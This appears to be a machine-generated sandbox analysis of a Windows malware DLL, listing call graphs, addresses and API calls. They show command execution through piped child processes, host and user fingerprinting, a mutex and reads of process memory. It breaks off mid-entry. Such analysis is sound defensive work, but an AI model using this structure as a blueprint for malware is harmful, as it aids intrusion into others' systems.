3999->4001 4002 7ffb1c81b5d9 wsprintfW 4000->4002 4003 7ffb1c81b5f4 CreateProcessW 4001->4003 4002->4003 4004 7ffb1c81b64b CloseHandle CloseHandle 4003->4004 4005 7ffb1c81b647 4003->4005 4004->4005 4005->3702 4007 7ffb1c81185d 4006->4007 4008 7ffb1c811530 Process32First 4006->4008 4007->3734 4008->4007 4011 7ffb1c811556 4008->4011 4009 7ffb1c811842 Process32Next 4009->4007 4009->4011 4010 7ffb1c81b984 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4010->4011 4011->4009 4011->4010 4012 7ffb1c81167e wsprintfA 4011->4012 4013 7ffb1c81b984 3 API calls 4012->4013 4015 7ffb1c8116ae 4013->4015 4014 7ffb1c81b984 3 API calls 4014->4015 4015->4014 4016 7ffb1c811718 wsprintfA 4015->4016 4017 7ffb1c81b984 3 API calls 4016->4017 4020 7ffb1c811748 4017->4020 4018 7ffb1c81b984 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4018->4020 4019 7ffb1c8114d8 3 API calls 4019->4020 4020->4018 4020->4019 4021 7ffb1c81b984 3 API calls 4020->4021 4021->4009 4023 7ffb1c8175ae 4022->4023 4024 7ffb1c8175c0 RtlInitUnicodeString 4023->4024 4030 7ffb1c817414 GetFileAttributesW 4024->4030 4027 7ffb1c81760e NtCreateFile 4028 7ffb1c817607 4027->4028 4029 7ffb1c817673 NtClose 4027->4029 4028->3760 4029->4028 4031 7ffb1c817439 4030->4031 4031->4027 4031->4028 4033 7ffb1c81ae1c 4032->4033 4034 7ffb1c817f36 SHGetFolderPathA 4033->4034 4035 7ffb1c817f5f 4034->4035 4036 7ffb1c81bae0 NtAllocateVirtualMemory 4035->4036 4038 7ffb1c817f6b 4036->4038 4037 7ffb1c817f78 4037->3789 4038->4037 4039 7ffb1c81b984 3 API calls 4038->4039 4039->4037 4041 7ffb1c8130d0 12 API calls 4040->4041 4043 7ffb1c81ceb9 4041->4043 4042 7ffb1c81cec6 4042->3630 4043->4042 4044 7ffb1c81ba98 3 API calls 4043->4044 4044->4042 4414 7ffb1c812200 4415 7ffb1c812245 4414->4415 4474 7ffb1c81221e 4414->4474 4416 7ffb1c81ad34 NtAllocateVirtualMemory 4415->4416 4417 7ffb1c81224f 4416->4417 4417->4474 4532 7ffb1c811030 4417->4532 4419 7ffb1c812302 4420 7ffb1c811030 21 API calls 4419->4420 4421 7ffb1c81239a 4420->4421 4422 7ffb1c811030 21 API calls 4421->4422 4423 7ffb1c812433 4422->4423 4424 7ffb1c811030 21 API calls 4423->4424 4425 7ffb1c8124cc 4424->4425 4426 7ffb1c811030 21 API calls 4425->4426 4427 7ffb1c812565 4426->4427 4428 7ffb1c811030 21 API calls 4427->4428 4429 7ffb1c8125fe 4428->4429 4430 7ffb1c811030 21 API calls 4429->4430 4431 7ffb1c812697 4430->4431 4432 7ffb1c811030 21 API calls 4431->4432 4433 7ffb1c812730 4432->4433 4434 7ffb1c811030 21 API calls 4433->4434 4435 7ffb1c8127c9 4434->4435 4436 7ffb1c811030 21 API calls 4435->4436 4437 7ffb1c812862 4436->4437 4438 7ffb1c811030 21 API calls 4437->4438 4439 7ffb1c8128fb 4438->4439 4440 7ffb1c81ad34 NtAllocateVirtualMemory 4439->4440 4441 7ffb1c81290e 4440->4441 4442 7ffb1c8129d2 4441->4442 4443 7ffb1c816634 NtAllocateVirtualMemory 4441->4443 4441->4474 4444 7ffb1c816634 NtAllocateVirtualMemory 4442->4444 4445 7ffb1c812a73 4442->4445 4452 7ffb1c81295f 4443->4452 4453 7ffb1c812a00 4444->4453 4446 7ffb1c816634 NtAllocateVirtualMemory 4445->4446 4447 7ffb1c812b14 4445->4447 4457 7ffb1c812aa1 4446->4457 4448 7ffb1c816634 NtAllocateVirtualMemory 4447->4448 4449 7ffb1c812bb5 4447->4449 4459 7ffb1c812b42 4448->4459 4450 7ffb1c816634 NtAllocateVirtualMemory 4449->4450 4451 7ffb1c812c56 4449->4451 4467 7ffb1c812be3 4450->4467 4454 7ffb1c816634 NtAllocateVirtualMemory 4451->4454 4455 7ffb1c812cf7 4451->4455 4452->4442 4463 7ffb1c81b984 3 API calls 4452->4463 4453->4445 4466 7ffb1c81b984 3 API calls 4453->4466 4472 7ffb1c812c84 4454->4472 4456 7ffb1c812d98 4455->4456 4458 7ffb1c816634 NtAllocateVirtualMemory 4455->4458 4460 7ffb1c816634 NtAllocateVirtualMemory 4456->4460 4462 7ffb1c812e39 4456->4462 4457->4447 4470 7ffb1c81b984 3 API calls 4457->4470 4478 7ffb1c812d25 4458->4478 4459->4449 4481 7ffb1c81b984 3 API calls 4459->4481 4486 7ffb1c812dc6 4460->4486 4461 7ffb1c813034 4554 7ffb1c811868 4461->4554 4464 7ffb1c812eda 4462->4464 4468 7ffb1c816634 NtAllocateVirtualMemory 4462->4468 4469 7ffb1c8129b9 4463->4469 4473 7ffb1c816634 NtAllocateVirtualMemory 4464->4473 4476 7ffb1c812f87 4464->4476 4475 7ffb1c812a5a 4466->4475 4467->4451 4483 7ffb1c81b984 3 API calls 4467->4483 4489 7ffb1c812e67 4468->4489 4471 7ffb1c81b984 3 API calls 4469->4471 4479 7ffb1c812afb 4470->4479 4480 7ffb1c8129c8 4471->4480 4472->4455 4492 7ffb1c81b984 3 API calls 4472->4492 4498 7ffb1c812f08 4473->4498 4482 7ffb1c81b984 3 API calls 4475->4482 4476->4461 4477 7ffb1c816634 NtAllocateVirtualMemory 4476->4477 4501 7ffb1c812fb5 4477->4501 4478->4456 4495 7ffb1c81b984 3 API calls 4478->4495 4484 7ffb1c81b984 3 API calls 4479->4484 4485 7ffb1c817b40 NtFreeVirtualMemory 4480->4485 4487 7ffb1c812b9c 4481->4487 4488 7ffb1c812a69 4482->4488 4490 7ffb1c812c3d 4483->4490 4491 7ffb1c812b0a 4484->4491 4485->4442 4486->4462 4504 7ffb1c81b984 3 API calls 4486->4504 4493 7ffb1c81b984 3 API calls 4487->4493 4494 7ffb1c817b40 NtFreeVirtualMemory 4488->4494 4489->4464 4507 7ffb1c81b984 3 API calls 4489->4507 4496 7ffb1c81b984 3 API calls 4490->4496 4497 7ffb1c817b40 NtFreeVirtualMemory 4491->4497 4499 7ffb1c812cde 4492->4499 4500 7ffb1c812bab 4493->4500 4494->4445 4502 7ffb1c812d7f 4495->4502 4503 7ffb1c812c4c 4496->4503 4497->4447 4498->4476 4514 7ffb1c81b984 3 API calls 4498->4514 4505 7ffb1c81b984 3 API calls 4499->4505 4506 7ffb1c817b40 NtFreeVirtualMemory 4500->4506 4501->4461 4517 7ffb1c81b984 3 API calls 4501->4517 4508 7ffb1c81b984 3 API calls 4502->4508 4509 7ffb1c817b40 NtFreeVirtualMemory 4503->4509 4510 7ffb1c812e20 4504->4510 4511 7ffb1c812ced 4505->4511 4506->4449 4512 7ffb1c812ec1 4507->4512 4513 7ffb1c812d8e 4508->4513 4509->4451 4515 7ffb1c81b984 3 API calls 4510->4515 4516 7ffb1c817b40 NtFreeVirtualMemory 4511->4516 4518 7ffb1c81b984 3 API calls 4512->4518 4519 7ffb1c817b40 NtFreeVirtualMemory 4513->4519 4520 7ffb1c812f68 4514->4520 4521 7ffb1c812e2f 4515->4521 4516->4455 4522 7ffb1c813015 4517->4522 4523 7ffb1c812ed0 4518->4523 4519->4456 4524 7ffb1c81b984 3 API calls 4520->4524 4525 7ffb1c817b40 NtFreeVirtualMemory 4521->4525 4526 7ffb1c81b984 3 API calls 4522->4526 4527 7ffb1c817b40 NtFreeVirtualMemory 4523->4527 4528 7ffb1c812f7a 4524->4528 4525->4462 4529 7ffb1c813027 4526->4529 4527->4464 4530 7ffb1c817b40 NtFreeVirtualMemory 4528->4530 4531 7ffb1c817b40 NtFreeVirtualMemory 4529->4531 4530->4476 4531->4461 4533 7ffb1c8110b0 4532->4533 4534 7ffb1c8110c2 6 API calls 4533->4534 4580 7ffb1c811000 4534->4580 4536 7ffb1c8111ff CreateProcessW 4537 7ffb1c81ad34 NtAllocateVirtualMemory 4536->4537 4538 7ffb1c811265 4537->4538 4539 7ffb1c81ad34 NtAllocateVirtualMemory 4538->4539 4548 7ffb1c8112a2 4539->4548 4540 7ffb1c8114b4 4543 7ffb1c8114c6 4540->4543 4545 7ffb1c817b40 NtFreeVirtualMemory 4540->4545 4541 7ffb1c81146c TerminateProcess CloseHandle CloseHandle CloseHandle CloseHandle 4541->4540 4542 7ffb1c8112cd PeekNamedPipe 4544 7ffb1c811385 PeekNamedPipe 4542->4544 4542->4548 4543->4419 4546 7ffb1c811435 GetExitCodeProcess 4544->4546 4544->4548 4545->4543 4547 7ffb1c81145b 4546->4547 4546->4548 4547->4541 4548->4540 4548->4541 4548->4542 4548->4544 4548->4546 4550 7ffb1c811334 ReadFile 4548->4550 4551 7ffb1c8113e4 ReadFile 4548->4551 4581 7ffb1c81c934 NtDelayExecution 4548->4581 4552 7ffb1c81b984 3 API calls 4550->4552 4553 7ffb1c81b984 3 API calls 4551->4553 4552->4544 4553->4546 4555 7ffb1c81187d 4554->4555 4556 7ffb1c8119f7 4554->4556 4555->4556 4557 7ffb1c8118aa 4555->4557 4558 7ffb1c817b40 NtFreeVirtualMemory 4555->4558 4556->4474 4559 7ffb1c8118ca 4557->4559 4560 7ffb1c817b40 NtFreeVirtualMemory 4557->4560 4558->4557 4561 7ffb1c8118ea 4559->4561 4563 7ffb1c817b40 NtFreeVirtualMemory 4559->4563 4560->4559 4562 7ffb1c81190a 4561->4562 4564 7ffb1c817b40 NtFreeVirtualMemory 4561->4564 4565 7ffb1c81192a 4562->4565 4566 7ffb1c817b40 NtFreeVirtualMemory 4562->4566 4563->4561 4564->4562 4567 7ffb1c81194a 4565->4567 4568 7ffb1c817b40 NtFreeVirtualMemory 4565->4568 4566->4565 4569 7ffb1c81196a 4567->4569 4570 7ffb1c817b40 NtFreeVirtualMemory 4567->4570 4568->4567 4571 7ffb1c81198a 4569->4571 4573 7ffb1c817b40 NtFreeVirtualMemory 4569->4573 4570->4569 4572 7ffb1c8119aa 4571->4572 4574 7ffb1c817b40 NtFreeVirtualMemory 4571->4574 4575 7ffb1c8119ca 4572->4575 4576 7ffb1c817b40 NtFreeVirtualMemory 4572->4576 4573->4571 4574->4572 4577 7ffb1c8119ea 4575->4577 4578 7ffb1c817b40 NtFreeVirtualMemory 4575->4578 4576->4575 4579 7ffb1c817b40 NtFreeVirtualMemory 4577->4579 4578->4577 4579->4556 4580->4536 4581->4548 4045 7ffb1c813ce4 4048 7ffb1c813cb4 4045->4048 4053 7ffb1c813868 4048->4053 4050 7ffb1c813cdb 4051 7ffb1c813cbd 4051->4050 4086 7ffb1c81c934 NtDelayExecution 4051->4086 4054 7ffb1c813888 4053->4054 4087 7ffb1c816328 4054->4087 4056 7ffb1c81388d 4085 7ffb1c813891 4056->4085 4099 7ffb1c818560 4056->4099 4060 7ffb1c8138bc 4061 7ffb1c818820 4 API calls 4060->4061 4060->4085 4062 7ffb1c8138d7 4061->4062 4063 7ffb1c8138ed GetCurrentProcess IsWow64Process 4062->4063 4062->4085 4064 7ffb1c81391a 4063->4064 4063->4085 4110 7ffb1c8168e8 GetAdaptersInfo 4064->4110 4066 7ffb1c81391f 4067 7ffb1c813959 CreateMutexW 4066->4067 4066->4085 4068 7ffb1c813979 GetLastError 4067->4068 4067->4085 4069 7ffb1c81399c GetModuleHandleW 4068->4069 4068->4085 4117 7ffb1c81463c GetModuleHandleW GetCurrentProcessId 4069->4117 4080 7ffb1c8139fb 4178 7ffb1c816250 CreateThread 4080->4178 4081 7ffb1c8139ea 4180 7ffb1c8133ac 4081->4180 4085->4051 4086->4051 4088 7ffb1c816331 4087->4088 4098 7ffb1c816367 4088->4098 4237 7ffb1c81a59c 4088->4237 4098->4056 4100 7ffb1c81857e 4099->4100 4101 7ffb1c81859b 4100->4101 4102 7ffb1c818590 RtlGetVersion 4100->4102 4103 7ffb1c8185a5 GetVersionExW 4101->4103 4104 7ffb1c8138b3 4101->4104 4102->4101 4103->4104 4105 7ffb1c818820 CreateToolhelp32Snapshot 4104->4105 4106 7ffb1c81ae1c 4105->4106 4107 7ffb1c818850 Process32FirstW 4106->4107 4108 7ffb1c81886c Process32NextW 4107->4108 4109 7ffb1c81888a FindCloseChangeNotification 4107->4109 4108->4108 4108->4109 4109->4060 4111 7ffb1c816921 4110->4111 4116 7ffb1c816945 4110->4116 4112 7ffb1c81ad34 NtAllocateVirtualMemory 4111->4112 4114 7ffb1c81692c GetAdaptersInfo 4112->4114 4113 7ffb1c817b40 NtFreeVirtualMemory 4115 7ffb1c816953 4113->4115 4114->4116 4115->4066 4116->4113 4116->4115 4282 7ffb1c817b80 4117->4282 4121 7ffb1c818560 2 API calls 4134 7ffb1c814690 4121->4134 4122 7ffb1c814743 GetCurrentProcessId 4122->4134 4123 7ffb1c81478d GetCurrentProcessId OpenProcess 4124 7ffb1c8147b4 NtQueryInformationProcess 4123->4124 4123->4134 4126 7ffb1c814b27 FindCloseChangeNotification 4124->4126 4124->4134 4126->4134 4127 7ffb1c814c23 4301 7ffb1c814c38 4127->4301 4128 7ffb1c8139b1 4128->4085 4143 7ffb1c816988 4128->4143 4129 7ffb1c81482a ReadProcessMemory 4129->4126 4132 7ffb1c814881 ReadProcessMemory 4129->4132 4130 7ffb1c814b3c 4133 7ffb1c81bb2c NtAllocateVirtualMemory 4130->4133 4140 7ffb1c814c12 4130->4140 4132->4126 4132->4134 4137 7ffb1c814b71 4133->4137 4134->4121 4134->4122 4134->4123 4134->4126 4134->4129 4134->4130 4135 7ffb1c81ad34 NtAllocateVirtualMemory 4134->4135 4292 7ffb1c81841c 4134->4292 4136 7ffb1c814907 WideCharToMultiByte 4135->4136 4142 7ffb1c81496a 4136->4142 4138 7ffb1c817b40 NtFreeVirtualMemory 4137->4138 4137->4140 4138->4140 4139 7ffb1c816298 MultiByteToWideChar NtAllocateVirtualMemory 4139->4142 4140->4127 4140->4128 4141 7ffb1c817b40 NtFreeVirtualMemory 4141->4126 4142->4139 4142->4141 4144 7ffb1c81ad34 NtAllocateVirtualMemory 4143->4144 4145 7ffb1c8169a0 4144->4145 4146 7ffb1c81bae0 NtAllocateVirtualMemory 4145->4146 4147 7ffb1c8169f3 4146->4147 4148 7ffb1c81bae0 NtAllocateVirtualMemory 4147->4148 4149 7ffb1c8139c1 4148->4149 4149->4085 4150 7ffb1c816864 4149->4150 4151 7ffb1c81687c 4150->4151 4152 7ffb1c81bae0 NtAllocateVirtualMemory 4151->4152 4153 7ffb1c8139d1 4152->4153 4153->4085 4154 7ffb1c81cf14 4153->4154 4155 7ffb1c81cea4 12 API calls 4154->4155 4156 7ffb1c81cf22 4155->4156 4157 7ffb1c8139e1 4156->4157 4158 7ffb1c816b9c 3 API calls 4156->4158 4169 7ffb1c81378c 4157->4169 4167 7ffb1c81cf3e new[] 4158->4167 4160 7ffb1c81cf6c 4162 7ffb1c81d191 4160->4162 4163 7ffb1c817b40 NtFreeVirtualMemory 4160->4163 4161 7ffb1c81ad34 NtAllocateVirtualMemory 4161->4167 4164 7ffb1c81d1a3 4162->4164 4165 7ffb1c817b40 NtFreeVirtualMemory 4162->4165 4163->4162 4164->4157 4166 7ffb1c817b40 NtFreeVirtualMemory 4164->4166 4165->4164 4166->4157 4167->4160 4167->4161 4168 7ffb1c81ccbc 2 API calls 4167->4168 4325 7ffb1c8179c8 4167->4325 4168->4167 4170 7ffb1c813250 12 API calls 4169->4170 4171 7ffb1c8137a6 4170->4171 4172 7ffb1c8137b3 4171->4172 4173 7ffb1c816b9c 3 API calls 4171->4173 4172->4080 4172->4081 4174 7ffb1c8137c1 4173->4174 4175 7ffb1c8177b0 2 API calls 4174->4175 4176 7ffb1c8137e5 NtClose 4175->4176 4176->4172 4179 7ffb1c816287 4178->4179 4179->4085 4181 7ffb1c8130d0 12 API calls 4180->4181 4182 7ffb1c8133f7 4181->4182 4183 7ffb1c813404 4182->4183 4184 7ffb1c813250 12 API calls 4182->4184 4183->4080 4185 7ffb1c813410 4184->4185 4185->4183 4186 7ffb1c81bb2c NtAllocateVirtualMemory 4185->4186 4187 7ffb1c813437 4186->4187 4188 7ffb1c816b9c 3 API calls 4187->4188 4189 7ffb1c813446 4188->4189 4190 7ffb1c816b9c 3 API calls 4189->4190 4191 7ffb1c813450 4190->4191 4192 7ffb1c817588 4 API calls 4191->4192 4193 7ffb1c81345a 4192->4193 4194 7ffb1c813712 4193->4194 4195 7ffb1c813462 4193->4195 4196 7ffb1c817b40 NtFreeVirtualMemory 4194->4196 4197 7ffb1c81bb2c NtAllocateVirtualMemory 4195->4197 4196->4183 4198 7ffb1c81347c 4197->4198 4199 7ffb1c816b9c 3 API calls 4198->4199 4200 7ffb1c81348b 4199->4200 4346 7ffb1c817504 4200->4346 4202 7ffb1c81349d 4202->4183 4203 7ffb1c8134dd wsprintfW 4202->4203 4204 7ffb1c813597 4203->4204 4205 7ffb1c8134fd 4203->4205 4206 7ffb1c8135cc wsprintfW 4204->4206 4207 7ffb1c813532 wsprintfW 4205->4207 4208 7ffb1c8135f3 4206->4208 4209 7ffb1c81355e 4207->4209 4210 7ffb1c813614 wsprintfW 4208->4210 4211 7ffb1c81357f wsprintfW 4209->4211 4212 7ffb1c81363f 4210->4212 4211->4212 4355 7ffb1c813728 4212->4355 4214 7ffb1c81365e 4215 7ffb1c817b40 NtFreeVirtualMemory 4214->4215 4216 7ffb1c813668 4215->4216 4217 7ffb1c817b40 NtFreeVirtualMemory 4216->4217 4218 7ffb1c813672 4217->4218 4219 7ffb1c817b40 NtFreeVirtualMemory 4218->4219 4220 7ffb1c81367f 4219->4220 4221 7ffb1c813c2c 3 API calls 4220->4221 4222 7ffb1c813690 4221->4222 4223 7ffb1c813a24 8 API calls 4222->4223 4224 7ffb1c813695 4223->4224 4225 7ffb1c81ad34 NtAllocateVirtualMemory 4224->4225 4226 7ffb1c81369f 4225->4226 4227 7ffb1c813703 ExitProcess 4226->4227 4228 7ffb1c81ba98 3 API calls 4226->4228 4229 7ffb1c8136be 4228->4229 4230 7ffb1c8136ea 4229->4230 4232 7ffb1c81ba98 3 API calls 4229->4232 4231 7ffb1c81b400 3 API calls 4230->4231 4233 7ffb1c8136f9 4231->4233 4234 7ffb1c8136d8 4232->4234 4235 7ffb1c817b40 NtFreeVirtualMemory 4233->4235 4236 7ffb1c81ba98 3 API calls 4234->4236 4235->4227 4236->4230 4238 7ffb1c81ab86 4237->4238 4239 7ffb1c816343 4238->4239 4241 7ffb1c81ab7c 4238->4241 4239->4098 4242 7ffb1c819484 4239->4242 4241->4238 4260 7ffb1c81869c 4241->4260 4243 7ffb1c81a2eb 4242->4243 4244 7ffb1c81634c 4243->4244 4246 7ffb1c81a2e1 4243->4246 4244->4098 4248 7ffb1c81a47c 4244->4248 4245 7ffb1c81869c GetProcAddress 4245->4246 4246->4243 4246->4245 4247 7ffb1c81a33b 4246->4247 4247->4244 4251 7ffb1c81a53f 4248->4251 4249 7ffb1c816355 4249->4098 4252 7ffb1c81904c 4249->4252 4251->4249 4264 7ffb1c81a350 4251->4264 4255 7ffb1c819417 4252->4255 4253 7ffb1c81635e 4253->4098 4256 7ffb1c81ac50 4253->4256 4254 7ffb1c81869c GetProcAddress 4254->4255 4255->4253 4255->4254 4259 7ffb1c81acc1 4256->4259 4257 7ffb1c81ad1e 4257->4098 4258 7ffb1c81869c GetProcAddress 4258->4259 4259->4257 4259->4258 4261 7ffb1c8186b6 4260->4261 4262 7ffb1c8186bd 4260->4262 4261->4241 4262->4261 4263 7ffb1c8187a7 GetProcAddress 4262->4263 4263->4261 4276 7ffb1c818a94 4264->4276 4266 7ffb1c81a36d 4266->4251 4267 7ffb1c81a360 4267->4266 4268 7ffb1c81ba98 3 API calls 4267->4268 4269 7ffb1c81a3af 4268->4269 4269->4266 4270 7ffb1c81a3d5 FindFirstFileW 4269->4270 4271 7ffb1c81a413 4270->4271 4274 7ffb1c81a3f5 4270->4274 4272 7ffb1c817b40 NtFreeVirtualMemory 4271->4272 4272->4266 4273 7ffb1c81a3fc FindNextFileW 4273->4271 4273->4274 4274->4271 4274->4273 4275 7ffb1c81a44e LoadLibraryW 4274->4275 4275->4271 4277 7ffb1c81ae1c 4276->4277 4278 7ffb1c818aaa GetSystemDirectoryW 4277->4278 4279 7ffb1c818abe 4278->4279 4281 7ffb1c818ad4 4278->4281 4280 7ffb1c81bb2c NtAllocateVirtualMemory 4279->4280 4280->4281 4281->4267 4283 7ffb1c8189d4 3 API calls 4282->4283 4284 7ffb1c817b89 4283->4284 4307 7ffb1c818bbc 4284->4307 4287 7ffb1c818ae0 4288 7ffb1c81ae1c 4287->4288 4289 7ffb1c818afe GetUserNameA 4288->4289 4290 7ffb1c818b2b 4289->4290 4291 7ffb1c818b12 wsprintfA 4289->4291 4290->4134 4291->4290 4293 7ffb1c818437 4292->4293 4294 7ffb1c81ad34 NtAllocateVirtualMemory 4293->4294 4295 7ffb1c818453 GetModuleFileNameW 4293->4295 4296 7ffb1c818496 4293->4296 4294->4293 4295->4296 4297 7ffb1c818473 4295->4297 4298 7ffb1c817b40 NtFreeVirtualMemory 4296->4298 4300 7ffb1c8184a5 4296->4300 4297->4293 4297->4296 4299 7ffb1c817b40 NtFreeVirtualMemory 4297->4299 4298->4300 4299->4297 4300->4134 4302 7ffb1c814c52 4301->4302 4303 7ffb1c814c46 4301->4303 4304 7ffb1c814c5c CloseHandle 4302->4304 4305 7ffb1c814c69 4302->4305 4306 7ffb1c817b40 NtFreeVirtualMemory 4303->4306 4304->4305 4305->4128 4306->4302 4308 7ffb1c818be5 4307->4308 4317 7ffb1c818d4c 4308->4317 4311 7ffb1c814684 4311->4287 4312 7ffb1c81ad34 NtAllocateVirtualMemory 4313 7ffb1c818c07 4312->4313 4314 7ffb1c818c35 4313->4314 4315 7ffb1c81b984 3 API calls 4313->4315 4316 7ffb1c817b40 NtFreeVirtualMemory 4314->4316 4315->4314 4316->4311 4318 7ffb1c81ad34 NtAllocateVirtualMemory 4317->4318 4319 7ffb1c818d68 4318->4319 4320 7ffb1c818bef 4319->4320 4322 7ffb1c818c4c 4319->4322 4320->4311 4320->4312 4323 7ffb1c818c6e 4322->4323 4324 7ffb1c818c89 wsprintfA 4323->4324 4324->4320 4326 7ffb1c8177b0 2 API calls 4325->4326 4327 7ffb1c8179fe 4326->4327 4328 7ffb1c817a02 4327->4328 4334 7ffb1c817768 4327->4334 4328->4167 4331 7ffb1c817a21 4337 7ffb1c8178c0 4331->4337 4342 7ffb1c817704 4334->4342 4338 7ffb1c81ad34 NtAllocateVirtualMemory 4337->4338 4339 7ffb1c81793a 4338->4339 4340 7ffb1c817957 NtReadFile 4339->4340 4341 7ffb1c817953 NtClose 4339->4341 4340->4341 4341->4328 4343 7ffb1c817721 4342->4343 4344 7ffb1c817730 NtQueryInformationFile 4343->4344 4345 7ffb1c817757 4344->4345 4345->4328 4345->4331 4347 7ffb1c8179c8 6 API calls 4346->4347 4348 7ffb1c817533 4347->4348 4349 7ffb1c817acc 4 API calls 4348->4349 4354 7ffb1c817537 4348->4354 4351 7ffb1c817557 4349->4351 4350 7ffb1c817572 4353 7ffb1c817b40 NtFreeVirtualMemory 4350->4353 4351->4350 4352 7ffb1c817694 2 API calls 4351->4352 4351->4354 4352->4350 4353->4354 4354->4202 4356 7ffb1c818ae0 2 API calls 4355->4356 4357 7ffb1c813762 4356->4357 4360 7ffb1c816298 4357->4360 4359 7ffb1c81376a 4359->4214 4361 7ffb1c8162b4 4360->4361 4362 7ffb1c81ad34 NtAllocateVirtualMemory 4361->4362 4364 7ffb1c8162c9 4362->4364 4363 7ffb1c8162d6 4363->4359 4364->4363 4365 7ffb1c8162f0 MultiByteToWideChar 4364->4365 4365->4363 4582 7ffb1c81b398 4583 7ffb1c81b3f2 4582->4583 4584 7ffb1c81b3ac 4582->4584 4585 7ffb1c81b3ca VirtualFree 4584->4585 4586 7ffb1c817b40 NtFreeVirtualMemory 4585->4586 4586->4583

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 7ffb1c817fa8-7ffb1c817fe1 call 7ffb1c81ad34 3 7ffb1c817fe3-7ffb1c817fe5 0->3 4 7ffb1c817fea-7ffb1c81800b GetAdaptersInfo 0->4 5 7ffb1c81836e-7ffb1c818375 3->5 6 7ffb1c818011-7ffb1c818044 call 7ffb1c81ad34 GetAdaptersInfo call 7ffb1c81ae78 4->6 7 7ffb1c8181fa-7ffb1c818200 4->7 16 7ffb1c818049-7ffb1c81804c 6->16 9 7ffb1c81820c-7ffb1c81822a call 7ffb1c81ad34 7->9 10 7ffb1c818202-7ffb1c818207 call 7ffb1c817b40 7->10 17 7ffb1c818230-7ffb1c818247 GetComputerNameExA 9->17 18 7ffb1c818369 9->18 10->9 19 7ffb1c81805d-7ffb1c818065 16->19 20 7ffb1c81804e-7ffb1c81805b 16->20 21 7ffb1c8182ad-7ffb1c8182c4 GetComputerNameExA 17->21 22 7ffb1c818249-7ffb1c818260 call 7ffb1c81ae78 17->22 18->5 26 7ffb1c81806a-7ffb1c818082 wsprintfA 19->26 20->26 24 7ffb1c81835f-7ffb1c818364 call 7ffb1c817b40 21->24 25 7ffb1c8182ca-7ffb1c8182cf 21->25 33 7ffb1c818262-7ffb1c81826f 22->33 34 7ffb1c818271-7ffb1c818279 22->34 24->18 29 7ffb1c8182e0-7ffb1c8182e7 25->29 30 7ffb1c8182d1-7ffb1c8182de 25->30 31 7ffb1c818086-7ffb1c81808e 26->31 35 7ffb1c8182ef-7ffb1c818306 call 7ffb1c81ae78 29->35 30->35 32 7ffb1c81809a-7ffb1c8180a9 31->32 36 7ffb1c8180af-7ffb1c8180b4 32->36 37 7ffb1c818176-7ffb1c81818d call 7ffb1c81ae78 32->37 38 7ffb1c81827e-7ffb1c8182a9 wsprintfA 33->38 34->38 47 7ffb1c818308-7ffb1c818318 35->47 48 7ffb1c81831a-7ffb1c818322 35->48 41 7ffb1c8180b6-7ffb1c8180cd call 7ffb1c81ae78 36->41 42 7ffb1c8180f7-7ffb1c81810e call 7ffb1c81ae78 36->42 49 7ffb1c81819e-7ffb1c8181a6 37->49 50 7ffb1c81818f-7ffb1c81819c 37->50 38->21 55 7ffb1c8180de-7ffb1c8180e6 41->55 56 7ffb1c8180cf-7ffb1c8180dc 41->56 57 7ffb1c818110-7ffb1c81811d 42->57 58 7ffb1c81811f-7ffb1c818127 42->58 53 7ffb1c81832a-7ffb1c81835b wsprintfA 47->53 48->53 54 7ffb1c8181ab-7ffb1c8181dd wsprintfA 49->54 50->54 53->24 59 7ffb1c8181df 54->59 60 7ffb1c8181e1-7ffb1c8181f4 54->60 61 7ffb1c8180eb-7ffb1c8180f5 55->61 56->61 62 7ffb1c81812c-7ffb1c818131 57->62 58->62 59->7 60->7 60->31 63 7ffb1c818136-7ffb1c818171 wsprintfA 61->63 62->63 63->32
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: wsprintf$AdaptersInfo$AllocateMemoryVirtual
                          • String ID: o
                          • API String ID: 2074107575-252678980
                          • Opcode ID: 5678bc6a62718c3e63ead93259fe08f5e85b7c10f4d34a2ffbc93c20a916c06a
                          • Instruction ID: 6579f2d307b091c627116e7378dc41451bb40cad13793c6e5edb9010fe13ac2f
                          • Opcode Fuzzy Hash: 5678bc6a62718c3e63ead93259fe08f5e85b7c10f4d34a2ffbc93c20a916c06a
                          • Instruction Fuzzy Hash: DAB1FEB661DE81CADA60CB24E4993BAB7E2FB88754F601135E68E43B59DF3CD544CB00

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 65 7ffb1c81463c-7ffb1c8146b9 GetModuleHandleW GetCurrentProcessId call 7ffb1c817b80 call 7ffb1c818ae0 call 7ffb1c81ae78 72 7ffb1c8146bb-7ffb1c8146cb 65->72 73 7ffb1c8146cd-7ffb1c8146d5 65->73 74 7ffb1c8146dd-7ffb1c81470b call 7ffb1c81bc1c call 7ffb1c81c99c 72->74 73->74 79 7ffb1c814711-7ffb1c81471d 74->79 80 7ffb1c81471f-7ffb1c81472f call 7ffb1c818560 call 7ffb1c818fe0 79->80 81 7ffb1c814735-7ffb1c814741 79->81 80->81 83 7ffb1c81474f-7ffb1c81475b 81->83 84 7ffb1c814743-7ffb1c814749 GetCurrentProcessId 81->84 86 7ffb1c814761-7ffb1c814769 83->86 87 7ffb1c814b32-7ffb1c814b36 83->87 84->83 90 7ffb1c81476b-7ffb1c81477c call 7ffb1c81841c 86->90 91 7ffb1c81478d-7ffb1c8147ae GetCurrentProcessId OpenProcess 86->91 87->79 88 7ffb1c814b3c-7ffb1c814b44 87->88 93 7ffb1c814c1c-7ffb1c814c21 88->93 94 7ffb1c814b4a-7ffb1c814b6c call 7ffb1c81bc64 call 7ffb1c81bb2c 88->94 97 7ffb1c814781-7ffb1c814783 90->97 91->87 92 